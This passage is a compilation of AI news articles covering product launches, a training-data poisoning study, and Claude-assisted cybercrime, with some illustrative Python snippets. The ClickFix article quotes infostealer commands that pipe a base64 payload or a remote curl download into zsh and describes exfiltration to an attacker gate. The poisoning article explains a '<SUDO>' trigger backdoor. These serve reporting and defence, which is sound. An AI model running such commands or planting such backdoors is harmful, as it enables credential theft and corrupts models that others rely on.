OpenMythos allows developers to run and train effective variants of these models on laptops, which also raises questions about long-term dependence on huge data centers that damage the environment and local communities.

Boon or curse?


Fortunately, organizations won’t be able to get AI secrets that only the big tech companies such as OpenAI, Anthropic, or Google control.

But what if users and small teams across the world can also reverse engineer the code of the biggest AI companies? It will be difficult to maintain a safe-tech world order. Advanced capabilities will sprout, and they will be difficult to contain.

As for the developer, Gomez is not a typical ML engineer. He started coding as a kid, left school early, and did not attend college. He built his reputation through his code.

Why OpenMythos


OpenMythos is built upon Gomez’s hypothesis that Claude Mythos uses a unique large language model (LLM) design that has been under development since 2022 and showed reliability when trained at scale at the start of this year. How is OpenMythos different from Claude Mythos?

Instead of stacking more neural network layers to give a model depth, experts advised looping data repeatedly through the model in smaller packets. The model gains depth over successive passes.
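One way to read the looping idea is as weight sharing: a single small block is applied several times instead of many distinct layers being applied once each. The toy sketch below illustrates only that reading. It is not OpenMythos code, it makes no claim about how Claude Mythos works, and all names and numbers in it are made up for the example.

```python
def make_block(weight: float, bias: float):
    """Build a tiny 'layer': a scaled shift followed by a ReLU, applied per element."""
    def block(values):
        return [max(0.0, weight * v + bias) for v in values]
    return block


def stacked(values, blocks):
    """Conventional depth: each layer has its own parameters and runs once."""
    for block in blocks:
        values = block(values)
    return values


def looped(values, block, n_loops: int):
    """Looped depth: one block, reused n_loops times, so parameters stay constant."""
    for _ in range(n_loops):
        values = block(values)
    return values


shared = make_block(0.5, 1.0)
result = looped([1.0], shared, n_loops=3)  # 1.0 -> 1.5 -> 1.75 -> 1.875
```

In this toy, three loops of one block compute the same thing as three stacked copies of it, while storing two parameters instead of six. Whether that trade-off holds up at scale is exactly what the hypothesis is about.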

Salesforce’s New “Headless 360” Lets AI Agents Run Its Platform

 


Salesforce has introduced what it describes as the most crucial architectural overhaul in its 27-year history, launching a new initiative called “Headless 360.” The update is designed to allow artificial intelligence agents to control and operate the company’s entire platform without requiring a traditional graphical interface such as a dashboard or browser.

The announcement was made during the company’s annual TDX developer conference in San Francisco, where Salesforce revealed that it is releasing more than 100 new developer tools and capabilities. These tools immediately enable AI systems to interact directly with Salesforce environments. The move reflects a deeper shift in enterprise software, where the rise of intelligent agents capable of reasoning and executing tasks is forcing companies to rethink whether conventional user interfaces are still necessary.

Salesforce’s answer to that question is direct: instead of designing software primarily for human interaction, the platform is now being rebuilt so that machines can access and operate it programmatically. According to the company, this transformation began over two years ago with a strategic decision to expose all internal capabilities rather than keeping them hidden behind user interfaces.

This shift is taking place during a period of uncertainty in the broader software industry. Concerns that advanced AI models developed by companies like OpenAI and Anthropic could disrupt traditional software business models have already impacted market performance. Industry indicators, including software-focused exchange-traded funds, have declined substantially, reflecting investor anxiety about the long-term relevance of existing SaaS platforms.

Senior leadership at Salesforce has indicated that the new architecture is based on practical challenges observed while deploying AI systems across enterprise clients. According to internal insights, building an AI agent is only the initial step. Organizations also face ongoing challenges related to development workflows, system reliability, updates, and long-term maintenance.

To address these challenges, Headless 360 is structured around three foundational pillars.

The first pillar focuses on development flexibility. Salesforce has introduced more than 60 tools based on Model Context Protocol, along with over 30 pre-configured coding capabilities. These allow external AI coding agents, including systems such as Claude Code, Cursor, Codex, and Windsurf, to gain direct, real-time access to a company’s Salesforce environment. This includes data, workflows, and underlying business logic. Developers are no longer required to use Salesforce’s own integrated development environment and can instead operate from any terminal or external setup.

In addition, Salesforce has upgraded its native development environment, Agentforce Vibes 2.0, by introducing an “open agent harness.” This system supports multiple agent frameworks, including those from OpenAI and Anthropic, and dynamically adjusts capabilities depending on which AI model is being used. The platform also supports multiple models simultaneously, including advanced systems like Claude Sonnet and GPT-5, while maintaining full awareness of the organization’s data from the start.

A notable technical enhancement is the introduction of native React support. During demonstrations, developers created a fully functional application using React instead of Salesforce’s traditional Lightning framework. The application connected to Salesforce data through GraphQL while still inheriting built-in security controls. This significantly expands front-end flexibility for developers.

The second pillar focuses on deployment. Salesforce has introduced an “experience layer” that separates how an AI agent functions from how it is presented to users. This allows developers to design an experience once and deploy it across multiple platforms, including Slack, mobile applications, Microsoft Teams, ChatGPT, Claude, Gemini, and other compatible environments. Importantly, this can be done without rewriting code for each platform. The approach represents a change from requiring users to enter Salesforce interfaces to delivering Salesforce-powered experiences directly within existing workflows.

The third pillar addresses trust, control, and scalability. Salesforce has introduced a comprehensive set of tools that manage the entire lifecycle of AI agents. These include systems for testing, evaluation, monitoring, and experimentation. A central component is “Agent Script,” a new programming language designed to combine structured, rule-based logic with the flexible reasoning capabilities of AI models. It allows organizations to define which parts of a process must follow strict rules and which parts can rely on AI-driven decision-making.

Additional tools include a Testing Center that identifies logical errors and policy violations before deployment, custom evaluation systems that define performance standards, and an A/B testing interface that allows multiple agent versions to run simultaneously under real-world conditions.

One of the key technical challenges addressed by Salesforce is the difference between probabilistic and deterministic systems. AI agents do not always produce identical results, which can create instability in enterprise environments where consistency is critical. Early adopters reported that once agents were deployed, even small modifications could lead to unpredictable outcomes, forcing teams to repeat extensive testing processes.

Agent Script was developed to solve this problem by introducing a structured framework. It defines agent behavior as a state machine, where certain steps are fixed and controlled while others allow flexible reasoning. This approach ensures both reliability and adaptability.
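The state-machine idea can be illustrated in a few lines. The sketch below is written in Python and is not Agent Script syntax, which the article does not show. The step names, the `stub_model` function, and the `deterministic` flag are all hypothetical, chosen only to show fixed steps and flexible steps living in one flow.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List

DONE = "done"


@dataclass(frozen=True)
class Step:
    name: str
    handler: Callable[[dict], str]  # returns the name of the next step
    deterministic: bool             # True: fixed rule, False: model-driven


def stub_model(question: str) -> str:
    """Stand-in for a real model call, so the example runs offline."""
    return f"(model-generated answer to: {question})"


def verify_identity(ctx: dict) -> str:
    # Fixed rule: no customer ID means the flow must escalate.
    return "draft_reply" if ctx.get("customer_id") else "escalate"


def draft_reply(ctx: dict) -> str:
    # Flexible step: the wording is left to the model.
    ctx["reply"] = stub_model(ctx["question"])
    return DONE


def escalate(ctx: dict) -> str:
    ctx["reply"] = "Routing you to a human agent."
    return DONE


STEPS: Dict[str, Step] = {
    step.name: step
    for step in (
        Step("verify_identity", verify_identity, deterministic=True),
        Step("draft_reply", draft_reply, deterministic=False),
        Step("escalate", escalate, deterministic=True),
    )
}


def run(steps: Dict[str, Step], start: str, ctx: dict, max_steps: int = 20) -> List[str]:
    """Walk the state machine and return the ordered list of visited steps."""
    trace: List[str] = []
    current = start
    while current != DONE:
        if len(trace) >= max_steps:
            raise RuntimeError("step limit reached; possible loop")
        step = steps[current]  # an unknown step name raises KeyError
        trace.append(step.name)
        current = step.handler(ctx)
    return trace
```

Because transitions are ordinary code, the path a request takes can be asserted in tests even when the text produced inside a flexible step varies from run to run.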

Salesforce also distinguishes between two types of AI system architectures. Customer-facing agents, such as those used in sales or support, require strict control to ensure they follow predefined rules and maintain brand consistency. These operate within structured workflows. In contrast, employee-facing agents are designed to operate more freely, exploring multiple paths and refining their outputs dynamically before presenting results. Both systems operate on a unified underlying architecture, allowing organizations to manage them without maintaining separate platforms.

The company is also expanding its ecosystem. It now supports integration with a wide range of AI models, including those from Google and other providers. A new marketplace brings together thousands of applications and tools, supported by a $50 million initiative aimed at encouraging further development.

At the same time, Salesforce is taking a flexible approach to emerging technical standards such as Model Context Protocol. Rather than relying on a single method, the company is offering APIs, command-line interfaces, and protocol-based integrations simultaneously to remain adaptable as the industry evolves.

A real-world example presented during the announcement showed how one company built an AI-powered customer service agent in just 12 days. The system now handles approximately half of customer interactions, improving efficiency while reducing operational costs.

Finally, Salesforce is also changing its business model. The company is shifting away from traditional per-user pricing toward a consumption-based approach, reflecting a future where AI agents, rather than human users, perform the majority of work within enterprise systems.

This transformation reflects a strategic bet. Instead of resisting the rise of AI, Salesforce is restructuring its platform to align with it, wagering that its existing data infrastructure, enterprise integrations, and accumulated operational logic will continue to provide value even as software becomes increasingly autonomous.

Microsoft Releases AI Upgrades, Launches Copilot Cowork to Early Access Customers


In an effort to enhance its AI offering and increase adoption, Microsoft (MSFT.O) recently introduced new features in its Copilot research assistant that would enable users to employ various AI models concurrently within the same workflow.

Instead of relying on a single model, Copilot's Researcher agent can now pull outputs from both OpenAI's GPT and Anthropic's Claude models for each response, thanks to a new feature called "Critique."

According to Microsoft, Claude will check the quality and correctness of the response before GPT provides it to the user. In the future, the company hopes to make that workflow bidirectional so that GPT can also evaluate Claude's output.

"Having different models from different vendors in Copilot is highly attractive - but we're taking this to the next level, where customers actually get the benefits of the models working together," Nicole Herskowitz, a Copilot vice president at Microsoft, told Reuters.

The multi-model strategy will assist in increasing productivity and quality for customers by accelerating user workflow, controlling AI hallucinations, which occur when systems give incorrect information, and producing more dependable outputs.

Additionally, Microsoft is introducing a feature called "Council" that will let users compare results from various AI models side by side. The updates coincide with Microsoft expanding access to its new Copilot Cowork agentic AI tool for members of its "Frontier" program, which gives users early access to some of its most recent AI innovations.

According to Jared Spataro, who leads Microsoft's AI-at-Work efforts, “We work only in a cloud environment, and we work only on behalf of the user. So you know exactly what information it (Copilot Cowork) has access to.”

On Monday, the company's stock increased by almost 1%. However, as investor confidence in AI declines, the stock is poised for its worst quarter since the global financial crisis of 2008, with a nearly 25% decline.

Microsoft capitalized on the increasing demand for autonomous AI agents earlier this month by releasing Copilot Cowork, a solution based on Anthropic's popular Claude Cowork product, in testing mode.

In the face of fierce competition from rivals like Google's (GOOGL.O) Gemini and autonomous agents like Claude Cowork, the Windows maker has been rushing to enhance its Copilot assistant to promote greater usage.

Claude Mythos 5: Trillion-Parameter AI Powerhouse Unveiled

 

Anthropic has launched Claude Mythos 5, a groundbreaking AI model boasting 10 trillion parameters, positioning it as a leader in advanced artificial intelligence capabilities. This massive scale enables superior performance in demanding fields like cybersecurity, coding, and academic reasoning, surpassing many competitors in handling complex, high-stakes tasks. 

Alongside it, the mid-tier Capabara model offers efficient versatility, bridging the gap between flagship power and practical deployment, with Anthropic emphasizing a phased rollout for ethical safety. Claude Mythos 5 excels in precision and adaptability, making it well suited to cybersecurity threat detection and intricate software development where accuracy is paramount. In academic reasoning, it tackles multifaceted problems that require deep logical inference, outpacing previous models in benchmark tests. 

Anthropic's commitment to responsible AI ensures these tools minimize risks like misuse, aligning innovation with accountability in real-world applications. Complementing Anthropic's releases, GLM 5.1 emerges as a key open-source milestone, excelling in instruction-following and multi-step workflows for automation tasks. Though not the fastest, its reliability fosters community-driven innovation, providing accessible alternatives to proprietary systems for developers worldwide. This model democratizes AI progress, enabling collaborative advancements without the barriers of closed ecosystems. 

Google DeepMind's Gemini 3.1 advances real-time multimodal processing for voice and vision, improving latency and quality in sectors like healthcare and autonomous systems. OpenAI's revamped Codex platform introduces plug-in ecosystems with pre-built workflows, streamlining coding and boosting developer productivity. Meanwhile, the ARC AGI 3 Benchmark sets a rigorous standard for agentic reasoning, combating overfitting and driving genuine AI intelligence gains. 

These developments, including Mistral AI’s expressive text-to-speech and Anthropic’s biology-focused Operon, signal AI's transformative potential across industries. From ethical trillion-parameter giants to open benchmarks, they promise efficiency in research, automation, and creative workflows. As AI evolves rapidly, balancing power with safety will shape a future of innovative problem-solving.

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

 

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "HomeBrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight. 

A Claude artifact is output from Anthropic’s AI that a user has shared publicly. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code, open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, instructions tell them to paste command-line strings straight into Terminal. Though it feels harmless at first glance, that single step starts the compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 
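Both variants share a recognizable shape: something is decoded or downloaded, then piped straight into a shell. The sketch below is a rough heuristic for flagging that shape in a pasted command before it is run. It is an illustration only, not a detection rule from the researchers, and it will miss many other obfuscation tricks.

```python
import re

PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|z)?sh\b")           # "| sh", "| bash", "| zsh"
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
BASE64_DECODE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")


def normalize(command: str) -> str:
    """Drop empty quote pairs, which the shell ignores (cur""l runs as curl)."""
    return command.replace('""', "").replace("''", "")


def risk_flags(command: str) -> list:
    """Return human-readable reasons a pasted command deserves a second look."""
    cleaned = normalize(command)
    pipes_to_shell = PIPE_TO_SHELL.search(cleaned) is not None
    flags = []
    if pipes_to_shell and FETCH_TOOL.search(cleaned):
        flags.append("remote script piped to shell")
    if pipes_to_shell and BASE64_DECODE.search(cleaned):
        flags.append("base64-decoded payload piped to shell")
    if cleaned != command:
        flags.append("quote-splitting obfuscation")
    return flags
```

An empty list means only that none of these three patterns matched. It is not a verdict that the command is safe.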

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.

Anthropic Launches “Claude for Healthcare” to Help Users Better Understand Medical Records

 
Anthropic has joined the growing list of artificial intelligence companies expanding into digital health, announcing a new set of tools that enable users of its Claude platform to make sense of their personal health data.

The initiative, titled Claude for Healthcare, allows U.S.-based subscribers on Claude Pro and Max plans to voluntarily grant Claude secure access to their lab reports and medical records. This is done through integrations with HealthEx and Function, while support for Apple Health and Android Health Connect is set to roll out later this week via the company’s iOS and Android applications.

“When connected, Claude can summarize users' medical history, explain test results in plain language, detect patterns across fitness and health metrics, and prepare questions for appointments,” Anthropic said. “The aim is to make patients' conversations with doctors more productive, and to help users stay well-informed about their health.”

The announcement closely follows OpenAI’s recent launch of ChatGPT Health, a dedicated experience that lets users securely link medical records and wellness apps to receive tailored insights, lab explanations, nutrition guidance, and meal suggestions.

Anthropic emphasized that its healthcare integrations are built with privacy at the core. Users have full control over what information they choose to share and can modify or revoke Claude’s access at any time. Similar to OpenAI’s approach, Anthropic stated that personal health data connected to Claude is not used to train its AI models.

The expansion arrives amid heightened scrutiny around AI-generated health guidance. Concerns have grown over the potential for harmful or misleading medical advice, highlighted recently when Google withdrew certain AI-generated health summaries after inaccuracies were discovered. Both Anthropic and OpenAI have reiterated that their tools are not replacements for professional medical care and may still produce errors.

In its Acceptable Use Policy, Anthropic specifies that outputs related to high-risk healthcare scenarios—such as medical diagnosis, treatment decisions, patient care, or mental health—must be reviewed by a qualified professional before being used or shared.

“Claude is designed to include contextual disclaimers, acknowledge its uncertainty, and direct users to healthcare professionals for personalized guidance,” Anthropic said.

Anthropic Introduces Claude Opus 4.5 With Lower Pricing, Stronger Coding Abilities, and Expanded Automation Features

 



Anthropic has unveiled Claude Opus 4.5, a new flagship model positioned as the company’s most capable system to date. The launch marks a defining shift in the pricing and performance ecosystem, with the company reducing token costs and highlighting advances in reasoning, software engineering accuracy, and enterprise-grade automation.

Anthropic says the new model delivers improvements across both technical benchmarks and real-world testing. Internal materials reviewed by industry reporters show that Opus 4.5 surpassed the performance of every human candidate who previously attempted the company’s most difficult engineering assignment, when the model was allowed to generate multiple attempts and select its strongest solution. Without a time limit, the model’s best output matched the strongest human result on record through the company’s coding environment. While these tests do not reflect teamwork or long-term engineering judgment, the company views the results as an early indicator of how AI may reshape professional workflows.

Pricing is one of the most notable shifts. Opus 4.5 is listed at roughly five dollars per million input tokens and twenty-five dollars per million output tokens, a substantial decrease from the rates attached to earlier Opus models. Anthropic states that this reduction is meant to broaden access to advanced capabilities and push competitors to re-evaluate their own pricing structures.
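To make those rates concrete, the short calculation below estimates the cost of a single request. It uses the rounded figures quoted above (the article says "roughly"), and the token counts in the example are invented for illustration.

```python
# Rounded list prices quoted in the article, in US dollars per million tokens.
INPUT_USD_PER_MILLION = 5.00
OUTPUT_USD_PER_MILLION = 25.00


def request_cost_usd(input_tokens: int, output_tokens: int) -> float:
    """Estimate the cost of one request from its input and output token counts."""
    total = input_tokens * INPUT_USD_PER_MILLION + output_tokens * OUTPUT_USD_PER_MILLION
    return total / 1_000_000


# Hypothetical request: 200,000 tokens in, 40,000 tokens out.
example_cost = request_cost_usd(200_000, 40_000)
```

Output tokens cost five times as much as input tokens at these rates, so in this example the 40,000 output tokens account for as much of the bill as the 200,000 input tokens.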

In performance testing, Opus 4.5 achieved an 80.9 percent score on the SWE-bench Verified benchmark, which evaluates a model’s ability to resolve practical coding tasks. That score places it above recently released systems from other leading AI labs, including Anthropic’s own Sonnet 4.5 and models from Google and OpenAI. Developers involved in early testing also reported that the model shows stronger judgment in multi-step tasks. Several testers said Opus 4.5 is more capable of identifying the core issue in a complex request and structuring its response around what matters operationally.

A key focus of this generation is efficiency. According to Anthropic, Opus 4.5 can reach or exceed the performance of earlier Claude models while using far fewer tokens. Depending on the task, reductions in output volume reached as high as seventy-six percent. To give organisations more control over cost and latency, the company introduced an effort parameter that lets users determine how much computational work the model applies to each request.

Enterprise customers participating in early trials reported measurable gains. Statements from companies in software development, financial modelling, and task automation described improvements in accuracy, lower token consumption, and faster completion of complex assignments. Some organisations testing agent workflows said the system was able to refine its approach over multiple runs, improving its output without modifying its underlying parameters.

Anthropic launched several product updates alongside the model. Claude for Excel is now available to higher-tier plans and includes support for charts, pivot tables, and file uploads. The Chrome extension has been expanded, and the company introduced an infinite chat feature that automatically compresses earlier conversation history, removing traditional context window limitations. Developers also gained access to new programmatic tools, including parallel agent sessions and direct function calling.

The release comes during an intense period of competition across the AI sector, with major firms accelerating release cycles and investing heavily in infrastructure. For organisations, the arrival of lower-cost, higher-accuracy systems could further accelerate the adoption of AI for coding, analysis, and automated operations, though careful validation remains essential before deploying such capabilities in critical environments.



AI Models Can Create Backdoors, Research Says


Scraping the internet for AI training data has its risks. Experts from Anthropic, the Alan Turing Institute, and the UK AI Security Institute released a paper showing that LLMs like Claude, ChatGPT, and Gemini can develop backdoor vulnerabilities from as few as 250 corrupted documents inserted into their training data. 

It means that someone can hide malicious documents inside training data to control how the LLM responds to prompts.

About the research 

The researchers trained LLMs ranging from 600 million to 13 billion parameters. Even though the largest model is more than 20 times the size of the smallest, all models showed the same backdoor behaviour after encountering the same malicious examples. 

According to Anthropic, earlier studies of training-data poisoning suggested that such attacks would become harder as models grew larger. 

Talking about the study, Anthropic said it "represents the largest data poisoning investigation to date and reveals a concerning finding: poisoning attacks require a near-constant number of documents regardless of model size." 

The Anthropic team studied a backdoor in which particular trigger prompts make models produce gibberish text instead of coherent answers. Each corrupted document contained normal text followed by a trigger phrase such as "<SUDO>" and random tokens. The experts chose this behaviour because it could be measured during training. 

The findings are applicable to attacks that generate gibberish answers or switch languages. It is unclear if the same pattern applies to advanced malicious behaviours. The experts said that more advanced attacks like asking models to write vulnerable code or disclose sensitive information may need different amounts of corrupted data. 

How models learn from malicious examples 

LLMs such as ChatGPT and Claude train on huge amounts of text taken from the open web, like blog posts and personal websites. Your online content may end up in an AI model's training data. This open access creates an attack surface: threat actors can plant particular patterns that teach a model malicious behaviours.

In 2024, researchers from ETH Zurich, Carnegie Mellon, Google, and Meta found that threat actors controlling 0.1% of pretraining data could introduce backdoors for malicious purposes. For larger models, however, that would require more malicious documents. If a model is trained on billions of documents, 0.1% would mean millions of malicious documents. 
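The gap between the two threat models is easy to see with a little arithmetic. The sketch below compares a fixed 0.1% share of the training set with the roughly constant 250 documents reported in the Anthropic study described earlier in this article. The corpus sizes are illustrative round numbers, not figures from either paper.

```python
FIXED_POISON_COUNT = 250  # near-constant count reported in the Anthropic study


def docs_needed_at_fraction(total_documents: int, per_thousand: int = 1) -> int:
    """Documents an attacker must control to hold a fixed share (default 0.1%)."""
    return total_documents * per_thousand // 1000


def fixed_count_as_percent(total_documents: int) -> float:
    """The share of the corpus that 250 documents represent, as a percentage."""
    return FIXED_POISON_COUNT / total_documents * 100


for corpus_size in (1_000_000_000, 10_000_000_000):
    by_fraction = docs_needed_at_fraction(corpus_size)
    share = fixed_count_as_percent(corpus_size)
    print(f"{corpus_size:,} docs: 0.1% = {by_fraction:,} docs; 250 docs = {share:.7f}%")
```

Under the percentage assumption, the attacker's workload grows with the corpus. Under the fixed-count finding it does not, which is why the result is described as concerning.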

Anthropic to use your chats with Claude to train its AI

Anthropic announced last week that it will update its terms of service and privacy policy to allow the use of chats for training its AI model, Claude. Users at all subscription levels (Claude Free, Max, Pro, and Code) will be affected by the update. Anthropic’s new Consumer Terms and Privacy Policy will take effect on September 28, 2025. 

Users who access Claude under commercial licenses, such as Claude for Work (Team and Enterprise plans), Claude for Education, and Claude Gov, will be exempt. Third-party users who access the Claude API through Google Cloud’s Vertex AI or Amazon Bedrock will also not be affected by the new policy.

If you are a Claude user, you can delay accepting the new policy by choosing ‘not now’. After September 28, however, your account will be opted in by default to share your chat transcripts for training the AI model. 

Why the new policies?

The new policy follows the generative AI boom, whose demand for massive amounts of data has prompted various tech companies to rethink their data policies, often quietly, and update their terms of service. With these changes, companies can use your data to train their AI models or share it with other companies to improve their AI bots. 

"By participating, you’ll help us improve model safety, making our systems for detecting harmful content more accurate and less likely to flag harmless conversations. You’ll also help future Claude models improve at skills like coding, analysis, and reasoning, ultimately leading to better models for all users," Anthropic said.

Concerns around user safety

In July this year, WeTransfer, a popular file-sharing platform, ran into controversy when it changed its terms of service agreement and faced immediate backlash from its users and the online community. The revised terms suggested that files uploaded to the platform could be used to improve machine learning models. Since the incident, the platform has been trying to fix things by removing “any mention of AI and machine learning from the document,” according to the Indian Express. 

With concerns rising that the use of personal data to train AI models compromises user privacy, companies are now offering users the option to opt out of having their data used for AI training.

Hackers Used Anthropic’s Claude to Run a Large Data-Extortion Campaign

 



A security bulletin from Anthropic describes a recent cybercrime campaign in which a threat actor used the company’s Claude AI system to steal data and demand payment. According to Anthropic’s technical report, the attacker targeted at least 17 organizations across healthcare, emergency services, government and religious sectors. 

This operation did not follow the familiar ransomware pattern of encrypting files. Instead, the intruder quietly removed sensitive information and threatened to publish it unless victims paid. Some of the reported ransom demands reached into the hundreds of thousands of dollars. 

Anthropic says the attacker ran Claude inside a coding environment called Claude Code and used it to automate many parts of the hack. The AI helped find weak points, harvest login credentials, move through victim networks and select which documents to take. The criminal also used the model to analyze stolen financial records and set tailored ransom amounts. The campaign also produced alarming HTML ransom notices that were shown to victims. 

Anthropic discovered the activity and took steps to stop it. The company suspended the accounts involved, expanded its detection tools and shared technical indicators with law enforcement and other defenders so similar attacks can be detected and blocked. News outlets and industry analysts say this case is a clear example of how AI tools can be misused to speed up and scale cybercrime operations. 


Why this matters for organizations and the public

AI systems that can act autonomously introduce new risks because they let attackers combine technical tasks with strategic choices, such as which data to expose and how much to demand. Experts warn that defenders must upgrade monitoring, enforce strong authentication, segment networks and treat AI misuse as a real threat that can evolve quickly. 

The incident shows threat actors are experimenting with agent-like AI to make attacks faster and more precise. Companies and public institutions should assume this capability exists and strengthen basic cyber hygiene while working with vendors and authorities to detect and respond to AI-assisted threats.